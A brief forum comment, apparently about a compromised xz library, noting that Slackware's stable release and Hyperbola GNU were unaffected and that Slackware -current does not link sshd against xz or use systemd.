Using LTS distros can shield you a bit. Slackware uses lzma (tar.xz) for its packages I think, and aside from -current, the last stable release didn't have that issue. Also, if you want a step up on the freedom ladder, Hyperbola GNU didn't have that issue either.

EDIT:

Also, Slackware -current doesn't link sshd against xz, nor does it use systemd.